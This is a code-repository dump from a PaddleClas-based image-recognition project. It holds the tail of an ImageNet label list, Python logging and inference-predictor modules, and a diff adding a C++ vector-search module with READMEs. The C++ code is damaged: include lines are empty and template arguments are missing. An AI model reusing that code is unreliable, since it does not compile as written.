cabinet +554 fireboat +555 fire engine, fire truck +556 fire screen, fireguard +557 flagpole, flagstaff +558 flute, transverse flute +559 folding chair +560 football helmet +561 forklift +562 fountain +563 fountain pen +564 four-poster +565 freight car +566 French horn, horn +567 frying pan, frypan, skillet +568 fur coat +569 garbage truck, dustcart +570 gasmask, respirator, gas helmet +571 gas pump, gasoline pump, petrol pump, island dispenser +572 goblet +573 go-kart +574 golf ball +575 golfcart, golf cart +576 gondola +577 gong, tam-tam +578 gown +579 grand piano, grand +580 greenhouse, nursery, glasshouse +581 grille, radiator grille +582 grocery store, grocery, food market, market +583 guillotine +584 hair slide +585 hair spray +586 half track +587 hammer +588 hamper +589 hand blower, blow dryer, blow drier, hair dryer, hair drier +590 hand-held computer, hand-held microcomputer +591 handkerchief, hankie, hanky, hankey +592 hard disc, hard disk, fixed disk +593 harmonica, mouth organ, harp, mouth harp +594 harp +595 harvester, reaper +596 hatchet +597 holster +598 home theater, home theatre +599 honeycomb +600 hook, claw +601 hoopskirt, crinoline +602 horizontal bar, high bar +603 horse cart, horse-cart +604 hourglass +605 iPod +606 iron, smoothing iron +607 jack-o'-lantern +608 jean, blue jean, denim +609 jeep, landrover +610 jersey, T-shirt, tee shirt +611 jigsaw puzzle +612 jinrikisha, ricksha, rickshaw +613 joystick +614 kimono +615 knee pad +616 knot +617 lab coat, laboratory coat +618 ladle +619 lampshade, lamp shade +620 laptop, laptop computer +621 lawn mower, mower +622 lens cap, lens cover +623 letter opener, paper knife, paperknife +624 library +625 lifeboat +626 lighter, light, igniter, ignitor +627 limousine, limo +628 liner, ocean liner +629 lipstick, lip rouge +630 Loafer +631 lotion +632 loudspeaker, speaker, speaker unit, loudspeaker system, speaker system +633 loupe, jeweler's loupe +634 lumbermill, sawmill +635 magnetic compass +636 mailbag, 
postbag +637 mailbox, letter box +638 maillot +639 maillot, tank suit +640 manhole cover +641 maraca +642 marimba, xylophone +643 mask +644 matchstick +645 maypole +646 maze, labyrinth +647 measuring cup +648 medicine chest, medicine cabinet +649 megalith, megalithic structure +650 microphone, mike +651 microwave, microwave oven +652 military uniform +653 milk can +654 minibus +655 miniskirt, mini +656 minivan +657 missile +658 mitten +659 mixing bowl +660 mobile home, manufactured home +661 Model T +662 modem +663 monastery +664 monitor +665 moped +666 mortar +667 mortarboard +668 mosque +669 mosquito net +670 motor scooter, scooter +671 mountain bike, all-terrain bike, off-roader +672 mountain tent +673 mouse, computer mouse +674 mousetrap +675 moving van +676 muzzle +677 nail +678 neck brace +679 necklace +680 nipple +681 notebook, notebook computer +682 obelisk +683 oboe, hautboy, hautbois +684 ocarina, sweet potato +685 odometer, hodometer, mileometer, milometer +686 oil filter +687 organ, pipe organ +688 oscilloscope, scope, cathode-ray oscilloscope, CRO +689 overskirt +690 oxcart +691 oxygen mask +692 packet +693 paddle, boat paddle +694 paddlewheel, paddle wheel +695 padlock +696 paintbrush +697 pajama, pyjama, pj's, jammies +698 palace +699 panpipe, pandean pipe, syrinx +700 paper towel +701 parachute, chute +702 parallel bars, bars +703 park bench +704 parking meter +705 passenger car, coach, carriage +706 patio, terrace +707 pay-phone, pay-station +708 pedestal, plinth, footstall +709 pencil box, pencil case +710 pencil sharpener +711 perfume, essence +712 Petri dish +713 photocopier +714 pick, plectrum, plectron +715 pickelhaube +716 picket fence, paling +717 pickup, pickup truck +718 pier +719 piggy bank, penny bank +720 pill bottle +721 pillow +722 ping-pong ball +723 pinwheel +724 pirate, pirate ship +725 pitcher, ewer +726 plane, carpenter's plane, woodworking plane +727 planetarium +728 plastic bag +729 plate rack +730 plow, plough +731 plunger, 
plumber's helper +732 Polaroid camera, Polaroid Land camera +733 pole +734 police van, police wagon, paddy wagon, patrol wagon, wagon, black Maria +735 poncho +736 pool table, billiard table, snooker table +737 pop bottle, soda bottle +738 pot, flowerpot +739 potter's wheel +740 power drill +741 prayer rug, prayer mat +742 printer +743 prison, prison house +744 projectile, missile +745 projector +746 puck, hockey puck +747 punching bag, punch bag, punching ball, punchball +748 purse +749 quill, quill pen +750 quilt, comforter, comfort, puff +751 racer, race car, racing car +752 racket, racquet +753 radiator +754 radio, wireless +755 radio telescope, radio reflector +756 rain barrel +757 recreational vehicle, RV, R.V. +758 reel +759 reflex camera +760 refrigerator, icebox +761 remote control, remote +762 restaurant, eating house, eating place, eatery +763 revolver, six-gun, six-shooter +764 rifle +765 rocking chair, rocker +766 rotisserie +767 rubber eraser, rubber, pencil eraser +768 rugby ball +769 rule, ruler +770 running shoe +771 safe +772 safety pin +773 saltshaker, salt shaker +774 sandal +775 sarong +776 sax, saxophone +777 scabbard +778 scale, weighing machine +779 school bus +780 schooner +781 scoreboard +782 screen, CRT screen +783 screw +784 screwdriver +785 seat belt, seatbelt +786 sewing machine +787 shield, buckler +788 shoe shop, shoe-shop, shoe store +789 shoji +790 shopping basket +791 shopping cart +792 shovel +793 shower cap +794 shower curtain +795 ski +796 ski mask +797 sleeping bag +798 slide rule, slipstick +799 sliding door +800 slot, one-armed bandit +801 snorkel +802 snowmobile +803 snowplow, snowplough +804 soap dispenser +805 soccer ball +806 sock +807 solar dish, solar collector, solar furnace +808 sombrero +809 soup bowl +810 space bar +811 space heater +812 space shuttle +813 spatula +814 speedboat +815 spider web, spider's web +816 spindle +817 sports car, sport car +818 spotlight, spot +819 stage +820 steam locomotive +821 steel 
arch bridge +822 steel drum +823 stethoscope +824 stole +825 stone wall +826 stopwatch, stop watch +827 stove +828 strainer +829 streetcar, tram, tramcar, trolley, trolley car +830 stretcher +831 studio couch, day bed +832 stupa, tope +833 submarine, pigboat, sub, U-boat +834 suit, suit of clothes +835 sundial +836 sunglass +837 sunglasses, dark glasses, shades +838 sunscreen, sunblock, sun blocker +839 suspension bridge +840 swab, swob, mop +841 sweatshirt +842 swimming trunks, bathing trunks +843 swing +844 switch, electric switch, electrical switch +845 syringe +846 table lamp +847 tank, army tank, armored combat vehicle, armoured combat vehicle +848 tape player +849 teapot +850 teddy, teddy bear +851 television, television system +852 tennis ball +853 thatch, thatched roof +854 theater curtain, theatre curtain +855 thimble +856 thresher, thrasher, threshing machine +857 throne +858 tile roof +859 toaster +860 tobacco shop, tobacconist shop, tobacconist +861 toilet seat +862 torch +863 totem pole +864 tow truck, tow car, wrecker +865 toyshop +866 tractor +867 trailer truck, tractor trailer, trucking rig, rig, articulated lorry, semi +868 tray +869 trench coat +870 tricycle, trike, velocipede +871 trimaran +872 tripod +873 triumphal arch +874 trolleybus, trolley coach, trackless trolley +875 trombone +876 tub, vat +877 turnstile +878 typewriter keyboard +879 umbrella +880 unicycle, monocycle +881 upright, upright piano +882 vacuum, vacuum cleaner +883 vase +884 vault +885 velvet +886 vending machine +887 vestment +888 viaduct +889 violin, fiddle +890 volleyball +891 waffle iron +892 wall clock +893 wallet, billfold, notecase, pocketbook +894 wardrobe, closet, press +895 warplane, military plane +896 washbasin, handbasin, washbowl, lavabo, wash-hand basin +897 washer, automatic washer, washing machine +898 water bottle +899 water jug +900 water tower +901 whiskey jug +902 whistle +903 wig +904 window screen +905 window shade +906 Windsor tie +907 wine bottle +908 
wing +909 wok +910 wooden spoon +911 wool, woolen, woollen +912 worm fence, snake fence, snake-rail fence, Virginia fence +913 wreck +914 yawl +915 yurt +916 web site, website, internet site, site +917 comic book +918 crossword puzzle, crossword +919 street sign +920 traffic light, traffic signal, stoplight +921 book jacket, dust cover, dust jacket, dust wrapper +922 menu +923 plate +924 guacamole +925 consomme +926 hot pot, hotpot +927 trifle +928 ice cream, icecream +929 ice lolly, lolly, lollipop, popsicle +930 French loaf +931 bagel, beigel +932 pretzel +933 cheeseburger +934 hotdog, hot dog, red hot +935 mashed potato +936 head cabbage +937 broccoli +938 cauliflower +939 zucchini, courgette +940 spaghetti squash +941 acorn squash +942 butternut squash +943 cucumber, cuke +944 artichoke, globe artichoke +945 bell pepper +946 cardoon +947 mushroom +948 Granny Smith +949 strawberry +950 orange +951 lemon +952 fig +953 pineapple, ananas +954 banana +955 jackfruit, jak, jack +956 custard apple +957 pomegranate +958 hay +959 carbonara +960 chocolate sauce, chocolate syrup +961 dough +962 meat loaf, meatloaf +963 pizza, pizza pie +964 potpie +965 burrito +966 red wine +967 espresso +968 cup +969 eggnog +970 alp +971 bubble +972 cliff, drop, drop-off +973 coral reef +974 geyser +975 lakeside, lakeshore +976 promontory, headland, head, foreland +977 sandbar, sand bar +978 seashore, coast, seacoast, sea-coast +979 valley, vale +980 volcano +981 ballplayer, baseball player +982 groom, bridegroom +983 scuba diver +984 rapeseed +985 daisy +986 yellow lady's slipper, yellow lady-slipper, Cypripedium calceolus, Cypripedium parviflorum +987 corn +988 acorn +989 hip, rose hip, rosehip +990 buckeye, horse chestnut, conker +991 coral fungus +992 agaric +993 gyromitra +994 stinkhorn, carrion fungus +995 earthstar +996 hen-of-the-woods, hen of the woods, Polyporus frondosus, Grifola frondosa +997 bolete +998 ear, spike, capitulum +999 toilet tissue, toilet paper, bathroom tissue 
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Console logging helpers for the deploy tools.

Provides ``info``/``warning``/``error`` wrappers that only emit on trainer 0
of a distributed (Fleet) job, optional ANSI coloring controlled by the
``PADDLECLAS_COLORING`` environment variable, a VisualDL scalar helper and a
start-up banner.
"""

import datetime
import logging
import os

logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s %(levelname)s: %(message)s",
    datefmt="%Y-%m-%d %H:%M:%S")


def time_zone(sec, fmt):
    """``logging.Formatter.converter`` hook: always report local "now".

    ``sec`` and ``fmt`` are required by the converter protocol but are
    intentionally ignored here.
    """
    real_time = datetime.datetime.now()
    return real_time.timetuple()


logging.Formatter.converter = time_zone
_logger = logging.getLogger(__name__)

# ANSI escape sequences used by coloring().
Color = {
    'RED': '\033[31m',
    'HEADER': '\033[35m',  # deep purple
    'PURPLE': '\033[95m',  # purple
    'OKBLUE': '\033[94m',
    'OKGREEN': '\033[92m',
    'WARNING': '\033[93m',
    'FAIL': '\033[91m',
    'ENDC': '\033[0m'
}


def coloring(message, color="OKGREEN"):
    """Wrap ``message`` in ANSI codes when ``PADDLECLAS_COLORING`` is set.

    Returns ``message`` unchanged when the environment variable is unset,
    so log files stay free of escape sequences by default.
    """
    assert color in Color
    if os.environ.get('PADDLECLAS_COLORING', False):
        return Color[color] + str(message) + Color["ENDC"]
    return message


def anti_fleet(log):
    """
    logs will print multi-times when calling Fleet API.
    Only display single log and ignore the others.
    """

    def wrapper(fmt, *args):
        # PADDLE_TRAINER_ID is set by the distributed launcher; only
        # trainer 0 logs. Single-process runs default to 0 and also log.
        if int(os.getenv("PADDLE_TRAINER_ID", 0)) == 0:
            log(fmt, *args)

    return wrapper


@anti_fleet
def info(fmt, *args):
    """Log an INFO message (trainer 0 only)."""
    _logger.info(fmt, *args)


@anti_fleet
def warning(fmt, *args):
    """Log a WARNING message, colored red (trainer 0 only)."""
    _logger.warning(coloring(fmt, "RED"), *args)


@anti_fleet
def error(fmt, *args):
    """Log an ERROR message, colored FAIL red (trainer 0 only)."""
    _logger.error(coloring(fmt, "FAIL"), *args)


def scaler(name, value, step, writer):
    """
    This function will draw a scalar curve generated by the visualdl.
    Usage: Install visualdl: pip3 install visualdl==2.0.0b4
    and then:
    visualdl --logdir ./scalar --host 0.0.0.0 --port 8830
    to preview loss curve in real time.
    """
    writer.add_scalar(tag=name, step=step, value=value)


def advertise():
    """
    Show the advertising message like the following:

    ===========================================================
    ==        PaddleClas is powered by PaddlePaddle !        ==
    ===========================================================
    ==                                                       ==
    ==   For more info please go to the following website.   ==
    ==                                                       ==
    ==       https://github.com/PaddlePaddle/PaddleClas      ==
    ===========================================================

    """
    copyright = "PaddleClas is powered by PaddlePaddle !"
    ad = "For more info please go to the following website."
    website = "https://github.com/PaddlePaddle/PaddleClas"
    AD_LEN = 6 + len(max([copyright, ad, website], key=len))

    info(
        coloring("\n{0}\n{1}\n{2}\n{3}\n{4}\n{5}\n{6}\n{7}\n".format(
            "=" * (AD_LEN + 4),
            "=={}==".format(copyright.center(AD_LEN)),
            "=" * (AD_LEN + 4),
            "=={}==".format(' ' * AD_LEN),
            "=={}==".format(ad.center(AD_LEN)),
            "=={}==".format(' ' * AD_LEN),
            "=={}==".format(website.center(AD_LEN)),
            "=" * (AD_LEN + 4), ), "RED"))
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base predictor built on the Paddle inference engine."""

import os

from paddle.inference import Config
from paddle.inference import create_predictor


class Predictor(object):
    """Base class for inference predictors.

    Builds a ``paddle.inference`` predictor from ``args`` (the parsed
    command-line / yaml configuration namespace) and keeps both the
    predictor and its ``Config``. Subclasses implement :meth:`predict`.
    """

    def __init__(self, args, inference_model_dir=None):
        # HALF precision (FP16) prediction only works when TensorRT is on.
        if args.use_fp16:
            assert args.use_tensorrt, \
                "use_fp16=True requires use_tensorrt=True"
        self.args = args
        self.paddle_predictor, self.config = self.create_paddle_predictor(
            args, inference_model_dir)

    def predict(self, image):
        """Run inference on ``image``; must be implemented by subclasses."""
        raise NotImplementedError

    def create_paddle_predictor(self, args, inference_model_dir=None):
        """Create a ``(predictor, Config)`` pair from an exported model dir.

        Falls back to ``args.inference_model_dir`` when
        ``inference_model_dir`` is not given. Expects the standard exported
        file names ``inference.pdmodel`` / ``inference.pdiparams``.
        """
        if inference_model_dir is None:
            inference_model_dir = args.inference_model_dir
        params_file = os.path.join(inference_model_dir, "inference.pdiparams")
        model_file = os.path.join(inference_model_dir, "inference.pdmodel")
        config = Config(model_file, params_file)

        if args.use_gpu:
            config.enable_use_gpu(args.gpu_mem, 0)
        else:
            config.disable_gpu()
            if args.enable_mkldnn:
                # cache 10 different shapes for mkldnn to avoid memory leak
                config.set_mkldnn_cache_capacity(10)
                config.enable_mkldnn()
        config.set_cpu_math_library_num_threads(args.cpu_num_threads)

        if args.enable_profile:
            config.enable_profile()
        config.disable_glog_info()
        config.switch_ir_optim(args.ir_optim)  # default true
        if args.use_tensorrt:
            config.enable_tensorrt_engine(
                precision_mode=Config.Precision.Half
                if args.use_fp16 else Config.Precision.Float32,
                max_batch_size=args.batch_size,
                min_subgraph_size=30)

        config.enable_memory_optim()
        # use zero copy
        config.switch_use_feed_fetch_ops(False)
        predictor = create_predictor(config)

        return predictor, config
a/Smart_container/PaddleClas/deploy/vector_search/Makefile b/Smart_container/PaddleClas/deploy/vector_search/Makefile new file mode 100644 index 0000000..ec2df59 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/Makefile @@ -0,0 +1,15 @@ +CXX=g++ + +ifeq ($(OS),Windows_NT) + postfix=dll +else + postfix=so +endif + +all : index + +index : src/config.h src/graph.h src/data.h interface.cc + ${CXX} -shared -fPIC interface.cc -o index.${postfix} -std=c++11 -Ofast -march=native -g -flto -funroll-loops -DOMP -fopenmp + +clean : + rm index.${postfix} \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/vector_search/README.md b/Smart_container/PaddleClas/deploy/vector_search/README.md new file mode 100644 index 0000000..afa1dc2 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/README.md @@ -0,0 +1,93 @@ +# 向量检索 + +**注意**:由于系统适配性问题,在新版本中,此检索算法将被废弃。新版本中将使用[faiss](https://github.com/facebookresearch/faiss),整体检索的过程保持不变,但建立索引及检索时的yaml文件有所修改。 +## 1. 简介 + +一些垂域识别任务(如车辆、商品等)需要识别的类别数较大,往往采用基于检索的方式,通过查询向量与底库向量进行快速的最近邻搜索,获得匹配的预测类别。向量检索模块提供基础的近似最近邻搜索算法,基于百度自研的Möbius算法,一种基于图的近似最近邻搜索算法,用于最大内积搜索 (MIPS)。 该模块提供python接口,支持numpy和 tensor类型向量,支持L2和Inner Product距离计算。 + +Mobius 算法细节详见论文 ([Möbius Transformation for Fast Inner Product Search on Graph](http://research.baidu.com/Public/uploads/5e189d36b5cf6.PDF), [Code](https://github.com/sunbelbd/mobius)) + + + +## 2. 
安装 + +### 2.1 直接使用提供的库文件 + +该文件夹下有已经编译好的`index.so`(gcc8.2.0下编译,用于Linux)以及`index.dll`(gcc10.3.0下编译,用于Windows),可以跳过2.2与2.3节,直接使用。 + +如果因为gcc版本过低或者环境不兼容的问题,导致库文件无法使用,则需要在不同的平台下手动编译库文件。 + +**注意:** +请确保您的 C++ 编译器支持 C++11 标准。 + + +### 2.2 Linux上编译生成库文件 + +运行下面的命令,安装gcc与g++。 + +```shell +sudo apt-get update +sudo apt-get upgrade -y +sudo apt-get install build-essential gcc g++ +``` + +可以通过命令`gcc -v`查看gcc版本。 + +进入该文件夹,直接运行`make`即可,如果希望重新生成`index.so`文件,可以首先使用`make clean`清除已经生成的缓存,再使用`make`生成更新之后的库文件。 + +### 2.3 Windows上编译生成库文件 + +Windows上首先需要安装gcc编译工具,推荐使用[TDM-GCC](https://jmeubank.github.io/tdm-gcc/articles/2020-03/9.2.0-release),进入官网之后,可以选择合适的版本进行下载。推荐下载[tdm64-gcc-10.3.0-2.exe](https://github.com/jmeubank/tdm-gcc/releases/download/v10.3.0-tdm64-2/tdm64-gcc-10.3.0-2.exe)。 + +下载完成之后,按照默认的安装步骤进行安装即可。这里有3点需要注意: +1. 向量检索模块依赖于openmp,因此在安装到`choose components`步骤的时候,需要勾选上`openmp`的安装选项,否则之后编译的时候会报错`libgomp.spec: No such file or directory`,[参考链接](https://github.com/dmlc/xgboost/issues/1027) +2. 安装过程中会提示是否需要添加到系统的环境变量中,这里建议勾选上,否则之后使用的时候还需要手动添加系统环境变量。 +3. Linux上的编译命令为`make`,Windows上为`mingw32-make`,这里需要区分一下。 + + +安装完成后,可以打开一个命令行终端,通过命令`gcc -v`查看gcc版本。 + +在该文件夹(deploy/vector_search)下,运行命令`mingw32-make`,即可生成`index.dll`库文件。如果希望重新生成`index.dll`文件,可以首先使用`mingw32-make clean`清除已经生成的缓存,再使用`mingw32-make`生成更新之后的库文件。 + +### 2.4 MacOS上编译生成库文件 + +运行下面的命令,安装gcc与g++: + +```shell +brew install gcc +``` +#### 注意: +1. 若提示 `Error: Running Homebrew as root is extremely dangerous and no longer supported...`, 参考该[链接](https://jingyan.baidu.com/article/e52e3615057a2840c60c519c.html)处理 +2. 若提示 `Error: Failure while executing; `tar --extract --no-same-owner --file...`, 参考该[链接](https://blog.csdn.net/Dawn510/article/details/117787358)处理 + +在安装之后编译后的可执行程序会被复制到/usr/local/bin下面,查看这个文件夹下的gcc: +``` +ls /usr/local/bin/gcc* +``` +可以看到本地gcc对应的版本号为gcc-11,编译命令如下: (如果本地gcc版本为gcc-9, 则相应命令修改为`CXX=g++-9 make`) +``` +CXX=g++-11 make +``` + +## 3. 
快速使用 + + import numpy as np + from interface import Graph_Index + + # 随机产生样本 + index_vectors = np.random.rand(100000,128).astype(np.float32) + query_vector = np.random.rand(128).astype(np.float32) + index_docs = ["ID_"+str(i) for i in range(100000)] + + # 初始化索引结构 + indexer = Graph_Index(dist_type="IP") #支持"IP"和"L2" + indexer.build(gallery_vectors=index_vectors, gallery_docs=index_docs, pq_size=100, index_path='test') + + # 查询 + scores, docs = indexer.search(query=query_vector, return_k=10, search_budget=100) + print(scores) + print(docs) + + # 保存与加载 + indexer.dump(index_path="test") + indexer.load(index_path="test") diff --git a/Smart_container/PaddleClas/deploy/vector_search/README_en.md b/Smart_container/PaddleClas/deploy/vector_search/README_en.md new file mode 100644 index 0000000..aecadfd --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/README_en.md @@ -0,0 +1,97 @@ +# Vector search + +**Attention**: Due to the system adaptability problem, this retrieval algorithm will be abandoned in the new version. [faiss](https://github.com/facebookresearch/faiss) will be used in the new version. The use process of the overall retrieval system base will remain unchanged, but the yaml files for build indexes and retrieval will be modified. + +## 1. Introduction + +Some vertical domain recognition tasks (e.g., vehicles, commodities, etc.) require a large number of recognized categories, and often use a retrieval-based approach to obtain matching predicted categories by performing a fast nearest neighbor search with query vectors and underlying library vectors. The vector search module provides the basic approximate nearest neighbor search algorithm based on Baidu's self-developed Möbius algorithm, a graph-based approximate nearest neighbor search algorithm for maximum inner product search (MIPS). This module provides python interface, supports numpy and tensor type vectors, and supports L2 and Inner Product distance calculation. 
+ +Details of the Mobius algorithm can be found in the paper.([Möbius Transformation for Fast Inner Product Search on Graph](http://research.baidu.com/Public/uploads/5e189d36b5cf6.PDF), [Code](https://github.com/sunbelbd/mobius)) + +## 2. Installation + +### 2.1 Use the provided library files directly + +This folder contains the compiled `index.so` (compiled under gcc8.2.0 for Linux) and `index.dll` (compiled under gcc10.3.0 for Windows), which can be used directly, skipping sections 2.2 and 2.3. + +If the library files are not available due to a low gcc version or an incompatible environment, you need to manually compile the library files under a different platform. + +**Note:** Make sure that C++ compiler supports the C++11 standard. + +### 2.2 Compile and generate library files on Linux + +Run the following command to install gcc and g++. + +``` +sudo apt-get update +sudo apt-get upgrade -y +sudo apt-get install build-essential gcc g++ +``` + +Check the gcc version by the command `gcc -v`. + +`make` can be operated directly. If you wish to regenerate the `index.so`, you can first use `make clean` to clear the cache, and then use `make` to generate the updated library file. + +### 2.3 Compile and generate library files on Windows + +You need to install gcc compiler tool first, we recommend using [TDM-GCC](https://jmeubank.github.io/tdm-gcc/articles/2020-03/9.2.0-release), you can choose the right version on the official website. We recommend downloading [tdm64-gcc-10.3.0-2.exe](https://github.com/jmeubank/tdm-gcc/releases/download/v10.3.0-tdm64-2/tdm64-gcc-10.3.0-2.exe). + +After the downloading, follow the default installation steps to install. There are 3 points to note here: + +1. The vector search module depends on openmp, so you need to check the `openmp` installation option when going on to `choose components` step, otherwise it will report an error `libgomp.spec: No such file or directory`, [reference link](https://github.com/dmlc/xgboost/issues/1027) +2. 
When being asked whether to add to the system environment variables, it is recommended to check here, otherwise you need to add the system environment variables manually later. +3. The compile command is `make` on Linux and `mingw32-make` on Windows, so you need to distinguish here. + +After installation, you can open a command line terminal and check the gcc version with the command `gcc -v`. + +Run the command `mingw32-make` to generate the `index.dll` library file under the folder (deploy/vector_search). If you want to regenerate the `index.dll` file, you can first use `mingw32-make clean` to clear the cache, and then use `mingw32-make` to generate the updated library file. + +### 2.4 Compile and generate library files on MacOS + +Run the following command to install gcc and g++: + +``` +brew install gcc +``` + +#### Caution: + +1. If prompted with `Error: Running Homebrew as root is extremely dangerous and no longer supported... `, refer to this [link](https://jingyan.baidu.com/article/e52e3615057a2840c60c519c.html) +2. If prompted with `Error: Failure while executing; tar --extract --no-same-owner --file... `, refer to this [link](https://blog.csdn.net/Dawn510/article/details/117787358). + +After installation the compiled executable is copied under /usr/local/bin, look at the gcc in this folder: + +``` +ls /usr/local/bin/gcc* +``` + +The local gcc version is gcc-11, and the compile command is as follows: (If the local gcc version is gcc-9, the corresponding command should be `CXX=g++-9 make`) + +``` +CXX=g++-11 make +``` + +## 3. 
Quick use + +``` +import numpy as np +from interface import Graph_Index + +# Random sample generation +index_vectors = np.random.rand(100000,128).astype(np.float32) +query_vector = np.random.rand(128).astype(np.float32) +index_docs = ["ID_"+str(i) for i in range(100000)] + +# Initialize index structure +indexer = Graph_Index(dist_type="IP") #support "IP" and "L2" +indexer.build(gallery_vectors=index_vectors, gallery_docs=index_docs, pq_size=100, index_path='test') + +# Query +scores, docs = indexer.search(query=query_vector, return_k=10, search_budget=100) +print(scores) +print(docs) + +# Save and load +indexer.dump(index_path="test") +indexer.load(index_path="test") +``` diff --git a/Smart_container/PaddleClas/deploy/vector_search/__init__.py b/Smart_container/PaddleClas/deploy/vector_search/__init__.py new file mode 100644 index 0000000..4ee26df --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/__init__.py @@ -0,0 +1 @@ +from .interface import Graph_Index diff --git a/Smart_container/PaddleClas/deploy/vector_search/index.dll b/Smart_container/PaddleClas/deploy/vector_search/index.dll new file mode 100644 index 0000000..5d54753 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/vector_search/index.dll differ diff --git a/Smart_container/PaddleClas/deploy/vector_search/index.so b/Smart_container/PaddleClas/deploy/vector_search/index.so new file mode 100644 index 0000000..d58d4f7 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/vector_search/index.so differ diff --git a/Smart_container/PaddleClas/deploy/vector_search/interface.cc b/Smart_container/PaddleClas/deploy/vector_search/interface.cc new file mode 100644 index 0000000..4013668 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/interface.cc @@ -0,0 +1,266 @@ +//MIT License +// +//Copyright (c) 2021 Mobius Authors + +//Permission is hereby granted, free of charge, to any person obtaining a copy +//of this software and associated documentation files 
(the "Software"), to deal +//in the Software without restriction, including without limitation the rights +//to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +//copies of the Software, and to permit persons to whom the Software is +//furnished to do so, subject to the following conditions: + +//The above copyright notice and this permission notice shall be included in all +//copies or substantial portions of the Software. + +//THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +//IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +//FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +//AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +//LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +//OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +//SOFTWARE. + +//from https://github.com/sunbelbd/mobius/blob/e2d166547d61d791da8f06747a63b9cd38f02c71/main.cc + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include"src/data.h" +#include"src/graph.h" + +struct IndexContext{ + void* graph; + void* data; +}; + + +int topk = 0; +int display_topk = 1; +int build_idx_offset = 0; +int query_idx_offset = 0; + +void flush_add_buffer( + std::vector>>>& add_buffer, + GraphWrapper* graph){ + #pragma omp parallel for + for(int i = 0;i < add_buffer.size();++i){ + auto& idx = add_buffer[i].first; + auto& point = add_buffer[i].second; + graph->add_vertex_lock(idx,point); + } + add_buffer.clear(); +} + + +extern "C"{ +// for mobius IP index +void build_mobius_index(float* dense_mat,int row,int dim, int pq_size, double mobius_pow , const char* prefix){ + std::unique_ptr data; + std::unique_ptr data_original; + std::unique_ptr graph; + int topk = 0; + int display_topk = 1; + int build_idx_offset = 0; + int query_idx_offset = 0; + + ++row; + data = 
std::unique_ptr(new Data(row,dim)); + graph = std::unique_ptr(new FixedDegreeGraph<3>(data.get())); + graph->set_construct_pq_size(pq_size); + + std::vector>>> add_buffer; + + ((FixedDegreeGraph<3>*)graph.get())->get_data()->mobius_pow = mobius_pow; + data_original = std::unique_ptr(new Data(row,dim)); + + std::vector> dummy_mobius_point; + for(int i = 0;i < dim;++i) + dummy_mobius_point.push_back(std::make_pair(i,0)); + + //idx += build_idx_offset; + + for(int i = 0;i < row - 1;++i){ + + std::vector> point; + point.reserve(dim); + for(int j = 0;j < dim;++j) + point.push_back(std::make_pair(j,dense_mat[i * dim + j])); + + data_original->add(i,point); + data->add_mobius(i,point); + if(i < 1000){ + graph->add_vertex(i,point); + }else{ + add_buffer.push_back(std::make_pair(i,point)); + } + if(add_buffer.size() >= 1000000) + flush_add_buffer(add_buffer,graph.get()); + } + flush_add_buffer(add_buffer,graph.get()); + graph->add_vertex(row - 1,dummy_mobius_point); + data.swap(data_original); + + std::string str = std::string(prefix); + data->dump(str + ".data"); + graph->dump(str + ".graph"); + +} + +void load_mobius_index_prefix(int row,int dim,IndexContext* index_context,const char* prefix){ + std::string str = std::string(prefix); + + ++row; + Data* data = new Data(row,dim); + GraphWrapper* graph = new FixedDegreeGraph<1>(data); + + //idx += build_idx_offset; + data->load(str + ".data"); + graph->load(str + ".graph"); + + ((FixedDegreeGraph<1>*)graph)->search_start_point = row - 1; + ((FixedDegreeGraph<1>*)graph)->ignore_startpoint = true; + + index_context->graph = graph; + index_context->data = data; +} + +void save_mobius_index_prefix(IndexContext* index_context,const char* prefix){ + std::string str = std::string(prefix); + Data* data = (Data*)(index_context->data); + GraphWrapper* graph = (GraphWrapper*)(index_context->graph); + + data->dump(str + ".data"); + graph->dump(str + ".graph"); +} + +void search_mobius_index(float* dense_vec,int dim,int search_budget,int 
